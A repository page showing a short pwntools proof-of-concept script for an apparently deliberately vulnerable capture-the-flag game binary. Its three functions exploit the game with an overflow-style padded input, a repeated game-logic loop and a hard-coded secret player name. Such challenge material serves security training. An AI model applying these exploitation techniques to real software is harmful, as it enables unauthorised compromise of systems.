myitinos
/
spell-warz-again-final
1
0
Fork 0
Code Issues 0 Pull Requests 0 Releases 0 Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
6 Commits
1 Branch
456 KiB
Tree: 565c7455f7
Branches Tags
${ item.name }
Create branch ${ searchTerm }
from '565c7455f7'
${ noResults }
spell-warz-again-final/poc.py

68 lines
1.5 KiB
Raw Normal View History

update
5 years ago
first commit
5 years ago
more patch
5 years ago
update
5 years ago
final version
5 years ago
first commit
5 years ago
update
5 years ago
first commit
5 years ago
update
5 years ago
first commit
5 years ago
update
5 years ago
final version
5 years ago
update
5 years ago
more patch
5 years ago
update
5 years ago
more patch
5 years ago
first commit
5 years ago
update
5 years ago
final version
5 years ago
update
5 years ago
more patch
5 years ago
 
  1. from pwn import process
  2. 

  3. FILENAME = "./spell-warz-again-final"
  4. 

  5. 

  6. def poc0():
  7.     p = process(FILENAME)
  8.     print p.recvuntil(">")
  9.     p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
  10.     print p.recvuntil(">")
  11.     p.sendline("y")
  12.     print p.recvuntil(">")
  13.     p.sendline("2")
  14.     print p.recvuntil(">")
  15.     p.sendline("4")
  16.     print p.recvuntil(">")
  17.     p.sendline("y")
  18.     for _ in xrange(10):
  19.         print p.recvuntil(">")
  20.         p.sendline("100")
  21.     p.interactive()
  22. 

  23. 

  24. def poc1():
  25.     p = process(FILENAME)
  26.     print p.recvuntil(">")
  27.     p.sendline("Leo")
  28.     print p.recvuntil(">")
  29.     p.sendline("y")
  30.     for _ in range(100):
  31.         print p.recvuntil(">")
  32.         p.sendline("3")
  33.         print p.recvuntil(">")
  34.         p.sendline("0")
  35.         print p.recvuntil(">")
  36.         p.sendline("y")
  37.         print p.recvuntil(">")
  38.         p.sendline("1")
  39.     print p.recvuntil(">")
  40.     p.sendline("4")
  41.     print p.recvuntil(">")
  42.     p.sendline("y")
  43.     for _ in range(10):
  44.         print p.recvuntil(">")
  45.         p.sendline("99")
  46.     p.interactive()
  47. 

  48. 

  49. def poc2():
  50.     p = process(FILENAME)
  51.     print p.recvuntil(">")
  52.     p.sendline("__th3_w0rLd_D3str0Y3r__")
  53.     print p.recvuntil(">")
  54.     p.sendline("y")
  55.     print p.recvuntil(">")
  56.     p.sendline("2")
  57.     print p.recvuntil(">")
  58.     p.sendline("4")
  59.     print p.recvuntil(">")
  60.     p.sendline("y")
  61.     for _ in xrange(10):
  62.         print p.recvuntil(">")
  63.         p.sendline("100")
  64.     p.interactive()
  65. 

  66. 

  67. if __name__ == "__main__":
  68.     poc1()